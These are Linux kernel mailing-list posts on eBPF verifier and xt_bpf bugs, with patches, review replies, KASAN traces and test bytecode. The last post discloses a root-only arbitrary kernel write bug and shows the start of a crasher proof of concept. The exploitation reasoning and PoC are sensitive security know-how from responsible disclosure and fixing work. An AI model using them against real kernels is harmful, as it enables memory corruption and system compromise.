> BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
> BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
> BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit
> BPF_EXIT_INSN(), // exit
> BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),
>
> BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),
> BPF_MOV64_IMM(BPF_REG_1, -42),
> BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),
> BPF_MOV64_IMM(BPF_REG_2, 2),
> BPF_ALU64_REG(BPF_RSH, BPF_REG_1, BPF_REG_2),
> BPF_EXIT_INSN()
> ===

For using the eBPF bytecode in selftests:

Signed-off-by: Jann Horn <ja...@google.com>


BPF: bug without effect in BPF_RSH case of adjust_scalar_min_max_vals()

2017-12-04 Thread Jann Horn
As far as I can tell, commit b03c9f9fdc37 ("bpf/verifier: track signed
and unsigned min/max values") introduced the following effectless bug
in the BPF_RSH case of adjust_scalar_min_max_vals() (unless that's
intentional):

`dst_reg->smax_value` is only updated in the case where
`dst_reg->smin_value < 0` and `umin_val == 0`. This is obviously
harmless if `dst_reg->smax_value >= 0`, but if `dst_reg->smax_value <
0`, this will temporarily result in a state where the signed upper
bound of `dst_reg` is lower than the signed lower bound (which will be
set to 0). I don't think this should ever happen.

Luckily, this doesn't have any effect because of the
inter-representation information propagation that happens immediately
afterwards: __update_reg_bounds() neither modifies nor propagates the
incorrect `reg->smax_value` (the assignment is a no-op in this case),
then `__reg_deduce_bounds` takes the first branch and resets
`reg->smax_value` to `reg->umax_value`, which is correct.

To test this, I applied this patch to the kernel:

===
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index d4593571c404..bcf6a4aa25cd 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -2205,8 +2205,10 @@ static int adjust_scalar_min_max_vals(struct
bpf_verifier_env *env,
  dst_reg->var_off = tnum_rshift(tnum_unknown, umin_val);
  dst_reg->umin_value >>= umax_val;
  dst_reg->umax_value >>= umin_val;
+ pr_warn("BPF_RSH point A: smin=%lld, smax=%lld, umin=%llx,
umax=%llx, tribits=%llx, trimask=%llx\n", dst_reg->smin_value,
dst_reg->smax_value, dst_reg->umin_value, dst_reg->umax_value,
dst_reg->var_off.value, dst_reg->var_off.mask);
  /* We may learn something more from the var_off */
  __update_reg_bounds(dst_reg);
+ pr_warn("BPF_RSH point B: smin=%lld, smax=%lld, umin=%llx,
umax=%llx, tribits=%llx, trimask=%llx\n", dst_reg->smin_value,
dst_reg->smax_value, dst_reg->umin_value, dst_reg->umax_value,
dst_reg->var_off.value, dst_reg->var_off.mask);
  break;
  default:
  mark_reg_unknown(env, regs, insn->dst_reg);
@@ -2214,7 +2216,11 @@ static int adjust_scalar_min_max_vals(struct
bpf_verifier_env *env,
  }

  __reg_deduce_bounds(dst_reg);
+ if (opcode == BPF_RSH)
+ pr_warn("BPF_RSH point C: smin=%lld, smax=%lld, umin=%llx,
umax=%llx, tribits=%llx, trimask=%llx\n", dst_reg->smin_value,
dst_reg->smax_value, dst_reg->umin_value, dst_reg->umax_value,
dst_reg->var_off.value, dst_reg->var_off.mask);
  __reg_bound_offset(dst_reg);
+ if (opcode == BPF_RSH)
+ pr_warn("BPF_RSH point D: smin=%lld, smax=%lld, umin=%llx,
umax=%llx, tribits=%llx, trimask=%llx\n", dst_reg->smin_value,
dst_reg->smax_value, dst_reg->umin_value, dst_reg->umax_value,
dst_reg->var_off.value, dst_reg->var_off.mask);
  return 0;
 }
===

Then I attempted to load the following eBPF bytecode with verbosity level 2:

===
BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),

BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
BPF_MOV32_IMM(BPF_REG_ARG2, 1),
BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit
BPF_EXIT_INSN(), // exit
BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),

BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),
BPF_MOV64_IMM(BPF_REG_1, -42),
BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),
BPF_MOV64_IMM(BPF_REG_2, 2),
BPF_ALU64_REG(BPF_RSH, BPF_REG_1, BPF_REG_2),
BPF_EXIT_INSN()
===

dmesg output:

===
[  145.423122] BPF_RSH point A: smin=0, smax=-27,
umin=3ff5, umax=3ff9,
tribits=3ff0, trimask=f
[  145.423129] BPF_RSH point B: smin=4611686018427387888, smax=-27,
umin=3ff5, umax=3ff9,
tribits=3ff0, trimask=f
[  145.423133] BPF_RSH point C: smin=4611686018427387893,
smax=4611686018427387897, umin=3ff5,
umax=3ff9, tribits=3ff0, trimask=f
[  145.423136] BPF_RSH point D: smin=4611686018427387893,
smax=4611686018427387897, umin=3ff5,
umax=3ff9, tribits=3ff0, trimask=f
===


Re: [PATCH] netfilter: add overflow checks in xt_bpf.c

2017-11-30 Thread Jann Horn
On Fri, Dec 1, 2017 at 5:04 AM, Willem de Bruijn
<willemdebruijn.ker...@gmail.com> wrote:
> On Thu, Nov 30, 2017 at 7:46 PM, Jann Horn <ja...@google.com> wrote:
>> Check whether inputs from userspace are too long (explicit length field too
>> big or string not null-terminated) to avoid out-of-bounds reads.
>>
>> As far as I can tell, this can at worst lead to very limited kernel heap
>> memory disclosure or oopses.
>>
>> This bug can be triggered by an unprivileged user even if the xt_bpf module
>> is not loaded: iptables is available in network namespaces, and the xt_bpf
>> module can be autoloaded.
>>
>> Triggering the bug with a classic BPF filter with fake length 0x1000 causes
>> the following KASAN report:
>>
>> ==
>> BUG: KASAN: slab-out-of-bounds in bpf_prog_create+0x84/0xf0
>> Read of size 32768 at addr 8801eff2c494 by task test/4627
>>
>> CPU: 0 PID: 4627 Comm: test Not tainted 4.15.0-rc1+ #1
>> [...]
>> Call Trace:
>>  dump_stack+0x5c/0x85
>>  print_address_description+0x6a/0x260
>>  kasan_report+0x254/0x370
>>  ? bpf_prog_create+0x84/0xf0
>>  memcpy+0x1f/0x50
>>  bpf_prog_create+0x84/0xf0
>>  bpf_mt_check+0x90/0xd6 [xt_bpf]
>> [...]
>> Allocated by task 4627:
>>  kasan_kmalloc+0xa0/0xd0
>>  __kmalloc_node+0x47/0x60
>>  xt_alloc_table_info+0x41/0x70 [x_tables]
>> [...]
>> The buggy address belongs to the object at 8801eff2c3c0
>> which belongs to the cache kmalloc-2048 of size 2048
>> The buggy address is located 212 bytes inside of
>>     2048-byte region [8801eff2c3c0, 8801eff2cbc0)
>> [...]
>> ==
>>
>> Fixes: e6f30c731718 ("netfilter: x_tables: add xt_bpf match")
>> Signed-off-by: Jann Horn <ja...@google.com>
>> ---
>>  net/netfilter/xt_bpf.c | 6 ++
>>  1 file changed, 6 insertions(+)
>>
>> diff --git a/net/netfilter/xt_bpf.c b/net/netfilter/xt_bpf.c
>> index 041da0d9c06f..1f7fbd3c7e5a 100644
>> --- a/net/netfilter/xt_bpf.c
>> +++ b/net/netfilter/xt_bpf.c
>> @@ -27,6 +27,9 @@ static int __bpf_mt_check_bytecode(struct sock_filter 
>> *insns, __u16 len,
>>  {
>> struct sock_fprog_kern program;
>>
>> +   if (len > XT_BPF_MAX_NUM_INSTR)
>> +   return -EINVAL;
>> +
>> program.len = len;
>> program.filter = insns;
>
> Next, this calls bpf_prog_create, which calls bpf_check_basics_ok to verify 
> len.

Irrelevant:

 - see the KASAN splat in the commit message
 - bpf_check_basics_ok checks against BPF_MAXINSNS (4096), but a check against
   XT_BPF_MAX_NUM_INSTR (64) is needed because that's the size of the
member in the
   input struct


[PATCH] netfilter: add overflow checks in xt_bpf.c

2017-11-30 Thread Jann Horn
Check whether inputs from userspace are too long (explicit length field too
big or string not null-terminated) to avoid out-of-bounds reads.

As far as I can tell, this can at worst lead to very limited kernel heap
memory disclosure or oopses.

This bug can be triggered by an unprivileged user even if the xt_bpf module
is not loaded: iptables is available in network namespaces, and the xt_bpf
module can be autoloaded.

Triggering the bug with a classic BPF filter with fake length 0x1000 causes
the following KASAN report:

==
BUG: KASAN: slab-out-of-bounds in bpf_prog_create+0x84/0xf0
Read of size 32768 at addr 8801eff2c494 by task test/4627

CPU: 0 PID: 4627 Comm: test Not tainted 4.15.0-rc1+ #1
[...]
Call Trace:
 dump_stack+0x5c/0x85
 print_address_description+0x6a/0x260
 kasan_report+0x254/0x370
 ? bpf_prog_create+0x84/0xf0
 memcpy+0x1f/0x50
 bpf_prog_create+0x84/0xf0
 bpf_mt_check+0x90/0xd6 [xt_bpf]
[...]
Allocated by task 4627:
 kasan_kmalloc+0xa0/0xd0
 __kmalloc_node+0x47/0x60
 xt_alloc_table_info+0x41/0x70 [x_tables]
[...]
The buggy address belongs to the object at 8801eff2c3c0
which belongs to the cache kmalloc-2048 of size 2048
The buggy address is located 212 bytes inside of
2048-byte region [8801eff2c3c0, 8801eff2cbc0)
[...]
==

Fixes: e6f30c731718 ("netfilter: x_tables: add xt_bpf match")
Signed-off-by: Jann Horn <ja...@google.com>
---
 net/netfilter/xt_bpf.c | 6 ++
 1 file changed, 6 insertions(+)

diff --git a/net/netfilter/xt_bpf.c b/net/netfilter/xt_bpf.c
index 041da0d9c06f..1f7fbd3c7e5a 100644
--- a/net/netfilter/xt_bpf.c
+++ b/net/netfilter/xt_bpf.c
@@ -27,6 +27,9 @@ static int __bpf_mt_check_bytecode(struct sock_filter *insns, 
__u16 len,
 {
struct sock_fprog_kern program;
 
+   if (len > XT_BPF_MAX_NUM_INSTR)
+   return -EINVAL;
+
program.len = len;
program.filter = insns;
 
@@ -55,6 +58,9 @@ static int __bpf_mt_check_path(const char *path, struct 
bpf_prog **ret)
mm_segment_t oldfs = get_fs();
int retval, fd;
 
+   if (strnlen(path, XT_BPF_PATH_MAX) == XT_BPF_PATH_MAX)
+   return -EINVAL;
+
set_fs(KERNEL_DS);
fd = bpf_obj_get_user(path, 0);
set_fs(oldfs);
-- 
2.15.0.531.g2ccb3012c9-goog



Re: [PATCH net] bpf: don't let ldimm64 leak map addresses on unprivileged

2017-05-07 Thread Jann Horn
On Mon, May 8, 2017 at 12:51 AM, Daniel Borkmann <dan...@iogearbox.net> wrote:
> On 05/08/2017 12:26 AM, Jann Horn wrote:
>>
>> On Mon, May 8, 2017 at 12:04 AM, Daniel Borkmann <dan...@iogearbox.net>
>> wrote:
>>>
>>> The patch fixes two things at once:
>>>
>>> 1) It checks the env->allow_ptr_leaks and only prints the map address to
>>> the log if we have the privileges to do so, otherwise it just dumps 0
>>> as we would when kptr_restrict is enabled on %pK. Given the latter is
>>> off by default and not every distro sets it, I don't want to rely on
>>> this, hence the 0 by default for unprivileged.
>>>
>>> 2) Printing of ldimm64 in the verifier log is currently broken in that
>>> we don't print the full immediate, but only the 32 bit part of the
>>> first insn part for ldimm64. Thus, fix this up as well; it's okay to
>>> access, since we verified all ldimm64 earlier already (including just
>>>     constants) through replace_map_fd_with_map_ptr().
>>>
>>> Fixes: cbd357008604 ("bpf: verifier (add ability to receive verification
>>> log)")
>>> Reported-by: Jann Horn <ja...@google.com>
>>> Signed-off-by: Daniel Borkmann <dan...@iogearbox.net>
>>
>> [...]
>>>
>>> @@ -362,9 +363,19 @@ static void print_bpf_insn(struct bpf_insn *insn)
>>>  insn->code,
>>>  bpf_ldst_string[BPF_SIZE(insn->code) >>
>>> 3],
>>>  insn->src_reg, insn->imm);
>>> -   } else if (BPF_MODE(insn->code) == BPF_IMM) {
>>> -   verbose("(%02x) r%d = 0x%x\n",
>>> -   insn->code, insn->dst_reg, insn->imm);
>>> +   } else if (BPF_MODE(insn->code) == BPF_IMM &&
>>> +  BPF_SIZE(insn->code) == BPF_DW) {
>>> +   /* At this point, we already made sure that the
>>> second
>>> +* part of the ldimm64 insn is accessible.
>>> +*/
>>> +   u64 imm = ((u64)(insn + 1)->imm << 32) |
>>> (u32)insn->imm;
>>> +   bool map_ptr = insn->src_reg ==
>>> BPF_PSEUDO_MAP_FD;
>>> +
>>> +   if (map_ptr && !env->allow_ptr_leaks)
>>> +   imm = 0;
>>> +
>>> +   verbose("(%02x) r%d = 0x%llx\n", insn->code,
>>> +   insn->dst_reg, (unsigned long long)imm);
>>>  } else {
>>>  verbose("BUG_ld_%02x\n", insn->code);
>>>  return;
>>
>>
>> You replaced the `BPF_MODE(insn->code) == BPF_IMM` branch with a
>> `BPF_MODE(insn->code) == BPF_IMM && BPF_SIZE(insn->code) == BPF_DW`
>> branch. Doesn't that break printing normal immediates?
>
>
> What do you mean by 'normal' immediates? You mean loads of imm into
> register, right? The ldimm64 is kind of special treated; for imms
> fitting into 32 bit, there is BPF_MOV64_IMM() and BPF_MOV32_IMM()
> otherwise.
>
> F.e. see the jumptable in __bpf_prog_run(), which is the interpreter.
> All BPF_LD instructions that we have are:
>
> static const void *jumptable[256] = {
>   [...]
>   [BPF_LD | BPF_ABS | BPF_W] = &_ABS_W,
>   [BPF_LD | BPF_ABS | BPF_H] = &_ABS_H,
>   [BPF_LD | BPF_ABS | BPF_B] = &_ABS_B,
>   [BPF_LD | BPF_IND | BPF_W] = &_IND_W,
>   [BPF_LD | BPF_IND | BPF_H] = &_IND_H,
>   [BPF_LD | BPF_IND | BPF_B] = &_IND_B,
>   [BPF_LD | BPF_IMM | BPF_DW] = &_IMM_DW,
> };
>
> In the print_bpf_insn() under class == BPF_LD, the BPF_ABS and BPF_IND
> are separately handled (load of packet data from skb), and the BPF_IMM
> is the one we're fixing, which only has BPF_DW as an option. I added it
> there since we really only want to see BPF_DW in this branch due to the
> double imm access.

Ah, right, I missed that. Nevermind.


Re: [PATCH net] bpf: don't let ldimm64 leak map addresses on unprivileged

2017-05-07 Thread Jann Horn
On Mon, May 8, 2017 at 12:04 AM, Daniel Borkmann <dan...@iogearbox.net> wrote:
> The patch fixes two things at once:
>
> 1) It checks the env->allow_ptr_leaks and only prints the map address to
>the log if we have the privileges to do so, otherwise it just dumps 0
>as we would when kptr_restrict is enabled on %pK. Given the latter is
>off by default and not every distro sets it, I don't want to rely on
>this, hence the 0 by default for unprivileged.
>
> 2) Printing of ldimm64 in the verifier log is currently broken in that
>we don't print the full immediate, but only the 32 bit part of the
>first insn part for ldimm64. Thus, fix this up as well; it's okay to
>access, since we verified all ldimm64 earlier already (including just
>constants) through replace_map_fd_with_map_ptr().
>
> Fixes: cbd357008604 ("bpf: verifier (add ability to receive verification 
> log)")
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Daniel Borkmann <dan...@iogearbox.net>
[...]
> @@ -362,9 +363,19 @@ static void print_bpf_insn(struct bpf_insn *insn)
> insn->code,
> bpf_ldst_string[BPF_SIZE(insn->code) >> 3],
> insn->src_reg, insn->imm);
> -   } else if (BPF_MODE(insn->code) == BPF_IMM) {
> -   verbose("(%02x) r%d = 0x%x\n",
> -   insn->code, insn->dst_reg, insn->imm);
> +   } else if (BPF_MODE(insn->code) == BPF_IMM &&
> +  BPF_SIZE(insn->code) == BPF_DW) {
> +   /* At this point, we already made sure that the second
> +* part of the ldimm64 insn is accessible.
> +*/
> +   u64 imm = ((u64)(insn + 1)->imm << 32) | 
> (u32)insn->imm;
> +   bool map_ptr = insn->src_reg == BPF_PSEUDO_MAP_FD;
> +
> +   if (map_ptr && !env->allow_ptr_leaks)
> +   imm = 0;
> +
> +   verbose("(%02x) r%d = 0x%llx\n", insn->code,
> +   insn->dst_reg, (unsigned long long)imm);
> } else {
> verbose("BUG_ld_%02x\n", insn->code);
> return;

You replaced the `BPF_MODE(insn->code) == BPF_IMM` branch with a
`BPF_MODE(insn->code) == BPF_IMM && BPF_SIZE(insn->code) == BPF_DW`
branch. Doesn't that break printing normal immediates?


Re: [PATCH net][v2] bpf: fix range arithmetic for bpf map access

2016-11-16 Thread Jann Horn
On Wed, Nov 16, 2016 at 9:25 PM, Josef Bacik <jba...@fb.com> wrote:
> On 11/16/2016 01:41 PM, Jann Horn wrote:
>>
>> On Tue, Nov 15, 2016 at 3:20 PM, Josef Bacik <jba...@fb.com> wrote:
>>>
>>> On 11/15/2016 08:47 AM, Jann Horn wrote:
>>>>
>>>> In states_equal():
>>>> if (rold->type == NOT_INIT ||
>>>>(rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT))
>>>> <
>>>> continue;
>>>>
>>>> I think this is broken in code like the following:
>>>>
>>>> int value;
>>>> if (condition) {
>>>>   value = 1; // visited first by verifier
>>>> } else {
>>>>   value = 100; // visited second by verifier
>>>> }
>>>> int dummy = 1; // states seem to converge here, but actually don't
>>>> map[value] = 1234;
>>>>
>>>> `value` would be an UNKNOWN_VALUE for both paths, right? So
>>>> states_equal() would decide that the states converge after the
>>>> conditionally executed code?
>>>>
>>>
>>> Value would be CONST_IMM for both paths, and wouldn't match so they
>>> wouldn't
>>> converge.  I think I understood your question right, let me know if I'm
>>> addressing the wrong part of it.
>>
>>
>> Okay, true, but what if you load the values from a map and bounds-check
>> them
>> instead of hardcoding them? Then they will be of type UNKNOWN_VALUE,
>> right?
>> Like this:
>>
>> int value = map[0];
>> if (condition) {
>>   value &= 0x1; // visited first by verifier
>> } else {
>>   // nothing; visited second by verifier
>> }
>> int dummy = 1; // states seem to converge here, but actually don't
>> map[value] = 1234;
>>
>> And then `rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT` will be
>> true in the `dummy = 1` line, and the states converge. Am I missing
>> something?
>>
>
> Ah ok yeah I see it now you are right.  This is slightly different from this
> particular problem so I'll send a second patch to address this, sound
> reasonable?  Thanks,

Sure, makes sense.


Re: [PATCH net][v2] bpf: fix range arithmetic for bpf map access

2016-11-16 Thread Jann Horn
On Tue, Nov 15, 2016 at 3:20 PM, Josef Bacik <jba...@fb.com> wrote:
> On 11/15/2016 08:47 AM, Jann Horn wrote:
>> In states_equal():
>> if (rold->type == NOT_INIT ||
>>(rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT))
>> <
>> continue;
>>
>> I think this is broken in code like the following:
>>
>> int value;
>> if (condition) {
>>   value = 1; // visited first by verifier
>> } else {
>>   value = 100; // visited second by verifier
>> }
>> int dummy = 1; // states seem to converge here, but actually don't
>> map[value] = 1234;
>>
>> `value` would be an UNKNOWN_VALUE for both paths, right? So
>> states_equal() would decide that the states converge after the
>> conditionally executed code?
>>
>
> Value would be CONST_IMM for both paths, and wouldn't match so they wouldn't
> converge.  I think I understood your question right, let me know if I'm
> addressing the wrong part of it.

Okay, true, but what if you load the values from a map and bounds-check them
instead of hardcoding them? Then they will be of type UNKNOWN_VALUE, right?
Like this:

int value = map[0];
if (condition) {
  value &= 0x1; // visited first by verifier
} else {
  // nothing; visited second by verifier
}
int dummy = 1; // states seem to converge here, but actually don't
map[value] = 1234;

And then `rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT` will be
true in the `dummy = 1` line, and the states converge. Am I missing something?


Re: [PATCH net][v2] bpf: fix range arithmetic for bpf map access

2016-11-15 Thread Jann Horn
On Tue, Nov 15, 2016 at 4:10 AM, Alexei Starovoitov
<alexei.starovoi...@gmail.com> wrote:
> On Mon, Nov 14, 2016 at 03:45:36PM -0500, Josef Bacik wrote:
>> I made some invalid assumptions with BPF_AND and BPF_MOD that could result in
>> invalid accesses to bpf map entries.  Fix this up by doing a few things
>>
>> 1) Kill BPF_MOD support.  This doesn't actually get used by the compiler in 
>> real
>> life and just adds extra complexity.
>>
>> 2) Fix the logic for BPF_AND, don't allow AND of negative numbers and set the
>> minimum value to 0 for positive AND's.
>>
>> 3) Don't do operations on the ranges if they are set to the limits, as they 
>> are
>> by definition undefined, and allowing arithmetic operations on those values
>> could make them appear valid when they really aren't.
>>
>> This fixes the testcase provided by Jann as well as a few other theoretical
>> problems.
>>
>> Reported-by: Jann Horn <ja...@google.com>
>> Signed-off-by: Josef Bacik <jba...@fb.com>
>
> lgtm.
> Acked-by: Alexei Starovoitov <a...@kernel.org>
>
> Jann, could you please double check the logic.
> Thanks!

I found some more potential issues, maybe Josef and you can tell me whether I
understood these correctly.


/* If the source register is a random pointer then the
* min_value/max_value values represent the range of the known
* accesses into that value, not the actual min/max value of the
* register itself.  In this case we have to reset the reg range
* values so we know it is not safe to look at.
*/
if (regs[insn->src_reg].type != CONST_IMM &&
   regs[insn->src_reg].type != UNKNOWN_VALUE) {
min_val = BPF_REGISTER_MIN_RANGE;
max_val = BPF_REGISTER_MAX_RANGE;
}

Why only the source register? Why not the destination register?


/* We don't know anything about what was done to this register, mark it
* as unknown.
*/
if (min_val == BPF_REGISTER_MIN_RANGE &&
   max_val == BPF_REGISTER_MAX_RANGE) {
reset_reg_range_values(regs, insn->dst_reg);
return;
}

Why have this special case at all? Since min_val and max_val are
basically independent, this code shouldn't be necessary, right?


static void check_reg_overflow(struct bpf_reg_state *reg)
{
if (reg->max_value > BPF_REGISTER_MAX_RANGE)
reg->max_value = BPF_REGISTER_MAX_RANGE;
if (reg->min_value < BPF_REGISTER_MIN_RANGE ||
   reg->min_value > BPF_REGISTER_MAX_RANGE)
reg->min_value = BPF_REGISTER_MIN_RANGE;
}

Why is this asymmetric? Why is `reg->max_value <
BPF_REGISTER_MIN_RANGE` not important, but `reg->min_value >
BPF_REGISTER_MAX_RANGE` is?


In states_equal():
if (rold->type == NOT_INIT ||
   (rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT))   <
continue;

I think this is broken in code like the following:

int value;
if (condition) {
  value = 1; // visited first by verifier
} else {
  value = 100; // visited second by verifier
}
int dummy = 1; // states seem to converge here, but actually don't
map[value] = 1234;

`value` would be an UNKNOWN_VALUE for both paths, right? So
states_equal() would decide that the states converge after the
conditionally executed code?


Re: [PATCH] bpf: fix range arithmetic for bpf map access

2016-11-11 Thread Jann Horn
On Fri, Nov 11, 2016 at 1:18 AM, Josef Bacik <jba...@fb.com> wrote:
> ---
> Sorry Jann, I saw your response last night and then promptly forgot about it,
> here's the git-send-email version.
> ---

A note: This doesn't seem to apply cleanly to current net-next (or I'm
too stupid to
use "git am"), so I'm applying it on f41cd11d64b2b21012eb4abffbe579bc0b90467f,
which is net-next from a few days ago.


> I made some invalid assumptions with BPF_AND and BPF_MOD that could result in
> invalid accesses to bpf map entries.  Fix this up by doing a few things
>
> 1) Kill BPF_MOD support.  This doesn't actually get used by the compiler in 
> real
> life and just adds extra complexity.

Yay! As a security person, I am very much in favor of killing unused features.


> 2) Fix the logic for BPF_AND.  If the min value is negative then that is the 
> new
> minimum, otherwise it is unconditionally 0.
>
> 3) Don't do operations on the ranges if they are set to the limits, as they 
> are
> by definition undefined, and allowing arithmetic operations on those values
> could make them appear valid when they really aren't.
>
> This fixes the testcase provided by Jann as well as a few other theoretical
> problems.
>
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Josef Bacik <jba...@fb.com>

A nit: check_mem_access() still has an explicit cast of reg->min_value to s64, I
think that's not necessary anymore?

> case BPF_AND:
> -   /* & is special since it could end up with 0 bits set. */
> -   dst_reg->min_value &= min_val;
> +   /* & is special since it's could be any value within our 
> range,
> +* including 0.  But if the thing we're AND'ing against is
> +* negative and we're negative then that's the minimum value,
> +* otherwise the minimum will always be 0.
> +*/
> +   if (min_val < 0 && dst_reg->min_value < 0)
> +   dst_reg->min_value = min_t(s64, dst_reg->min_value,
> +  min_val);
> +   else
> +   dst_reg->min_value = 0;
> dst_reg->max_value = max_val;

I'm not sure whether this is correct when dealing with signed numbers.
Let's say I have -2 and -3 (as u32: 0xfffe and 0xfffd) and AND them
together. The result is 0xfffc, or -4, right? So if I just compute
the AND of
constant numbers -2 and -3 (known to the verifier), the verifier would
compute minimum -3 while the actual value is -4, right?

If I am correct about this, I think it might make sense to just reset
the state to
unknown in the `min_val < 0 && dst_reg->min_value < 0` case. That shouldn't
occur in legitimate programs, right?


Re: 484611357c19 introduces arbitrary kernel write bug (root-only)

2016-11-09 Thread Jann Horn
Can you resend with "git send-email" or so? "git am" says that the
patch is corrupt, likely because of line wrapping.

On Wed, Nov 9, 2016 at 10:21 PM, Josef Bacik <jba...@fb.com> wrote:
> On 11/08/2016 07:23 PM, Jann Horn wrote:
>>
>> In 484611357c19 (not in any stable kernel yet), functionality is
>> introduced that allows root (and afaics nobody else, since nobody else
>> is allowed to perform pointer arithmetic) to basically write to (and
>> read from) arbitrary kernel memory. There are multiple bugs in the
>> validation logic:
>>
>>  - A bitwise AND of values in the ranges [a,b] and [c,d] is assumed to
>> always result in a value
>>>= a However, for the combination of ranges [1,1] and [1,2],
>> this calculates a minimum of 1
>>while actually, 1&2 is zero. This is the bug that my crasher
>> (below) triggers.
>>  - a%b is assumed to always be smaller than b-1. However, for b==0,
>> this will calculate an upper
>>limit of -1 while the values will actually always be zero.
>>  - I'm not sure about this, but I think that, when only one end of the
>> range is bounded, the logic will
>>incorrectly also treat the other end as a bounded, and because of
>> the usage of bound
>>placeholders that are smaller than the actual maximum values, this
>> could be used to perform
>>out-of-bounds accesses.
>>
>> The fun part here is that, as soon as the validation is just
>> off-by-one, arithmetic transformations can be used to turn that into
>> out-of-bounds accesses at arbitrary offsets. The crasher turns the
>> off-by-one into a memory write at offset 0x1000.
>>
>
> Can you give this a whirl?  It addresses your testcase and the other issues
> you've brought up.  Thanks
>
> From e47a1de98af2c1bcebd4224f546e3be1fd340b6a Mon Sep 17 00:00:00 2001
> From: Josef Bacik <jba...@fb.com>
> Date: Wed, 9 Nov 2016 16:09:52 -0500
> Subject: [PATCH] bpf: fix range arithmetic for bpf map access
>
> I made some invalid assumptions with BPF_AND and BPF_MOD that could result
> in
> invalid accesses to bpf map entries.  Fix this up by doing a few things
>
> 1) Kill BPF_MOD support.  This doesn't actually get used by the compiler in
> real
> life and just adds extra complexity.
>
> 2) Fix the logic for BPF_AND.  If the min value is negative then that is the
> new
> minimum, otherwise it is unconditionally 0.
>
> 3) Don't do operations on the ranges if they are set to the limits, as they
> are
> by definition undefined, and allowing arithmetic operations on those values
> could make them appear valid when they really aren't.
>
> This fixes the testcase provided by Jann as well as a few other theoretical
> problems.
>
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Josef Bacik <jba...@fb.com>
> ---
>  include/linux/bpf_verifier.h |  3 +-
>  kernel/bpf/verifier.c| 65
> 
>  2 files changed, 44 insertions(+), 24 deletions(-)
>
> diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
> index ac5b393..15ceb7f 100644
> --- a/include/linux/bpf_verifier.h
> +++ b/include/linux/bpf_verifier.h
> @@ -22,7 +22,8 @@ struct bpf_reg_state {
>  * Used to determine if any memory access using this register will
>  * result in a bad access.
>  */
> -   u64 min_value, max_value;
> +   s64 min_value;
> +   u64 max_value;
> u32 id;
> union {
> /* valid when type == CONST_IMM | PTR_TO_STACK |
> UNKNOWN_VALUE */
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index 9002575..840533a 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -234,8 +234,8 @@ static void print_verifier_state(struct
> bpf_verifier_state *state)
> reg->map_ptr->value_size,
> reg->id);
> if (reg->min_value != BPF_REGISTER_MIN_RANGE)
> -   verbose(",min_value=%llu",
> -   (unsigned long long)reg->min_value);
> +   verbose(",min_value=%lld",
> +   (long long)reg->min_value);
> if (reg->max_value != BPF_REGISTER_MAX_RANGE)
> verbose(",max_value=%llu",
> (unsigned long long)reg->max_value);
> @@ -1490,7 +1490,7 @@ static void check_reg_overflow(struct bpf_reg_state
> *reg)
>  {
> if (reg->max_value > BPF_REGISTER_MAX_RANGE)
>   

484611357c19 introduces arbitrary kernel write bug (root-only)

2016-11-08 Thread Jann Horn
In 484611357c19 (not in any stable kernel yet), functionality is
introduced that allows root (and afaics nobody else, since nobody else
is allowed to perform pointer arithmetic) to basically write to (and
read from) arbitrary kernel memory. There are multiple bugs in the
validation logic:

 - A bitwise AND of values in the ranges [a,b] and [c,d] is assumed to
always result in a value
   >= a However, for the combination of ranges [1,1] and [1,2],
this calculates a minimum of 1
   while actually, 1&2 is zero. This is the bug that my crasher
(below) triggers.
 - a%b is assumed to always be smaller than b-1. However, for b==0,
this will calculate an upper
   limit of -1 while the values will actually always be zero.
 - I'm not sure about this, but I think that, when only one end of the
range is bounded, the logic will
   incorrectly also treat the other end as a bounded, and because of
the usage of bound
   placeholders that are smaller than the actual maximum values, this
could be used to perform
   out-of-bounds accesses.

The fun part here is that, as soon as the validation is just
off-by-one, arithmetic transformations can be used to turn that into
out-of-bounds accesses at arbitrary offsets. The crasher turns the
off-by-one into a memory write at offset 0x1000.

Here's the crasher program:
=
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* start from kernel */
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) {\
.code  = BPF_JMP | BPF_CALL,\
.dst_reg = 0,   \
.src_reg = 0,   \
.off   = 0, \
.imm   = (FUNC) }) /* ??? */
#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) {\
.code  = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0,   \
.off   = 0, \
.imm   = IMM })
#define BPF_REG_ARG1BPF_REG_1
#define BPF_REG_ARG2BPF_REG_2
#define BPF_REG_ARG3BPF_REG_3
#define BPF_REG_ARG4BPF_REG_4
